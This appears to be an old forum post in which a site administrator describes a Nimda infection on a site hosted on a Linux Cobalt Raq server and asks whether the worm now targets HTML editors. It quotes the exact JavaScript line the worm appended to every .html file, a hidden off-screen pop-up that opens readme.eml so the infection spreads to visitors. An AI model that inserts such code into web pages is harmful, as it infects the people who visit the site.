Nimda spreading through a site on a linux server?!

Has anyone else ever seen this? We have a site on a Cobalt Raq that looks like it was uploaded by a Windows user who was/is infected with the Nimda virus. I'm not sure what HTML editor they are using but here is what it looks like the virus did.

1) It added this line of code to the bottom of every .html file:

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

2) it uploaded the readme.eml to the sites DocumentRoot.

Then you go to the sight, and the virus tries to sperad just like it does on infected Windows servers.

Norton caught it and labled it:

"W32.Nimda.A@mm(html) virus"


The site is has a lot of Flash and javaScript.

I guess my question is, is this something new? Is the virus actually aiming towards the HTML editor programs now also?

I know the actual server is not going to be harmed, so please no "Don't woory about it, Linux is not affected..." responses Nimda spreading through a site on a linux server?!

 

 

 

 

Top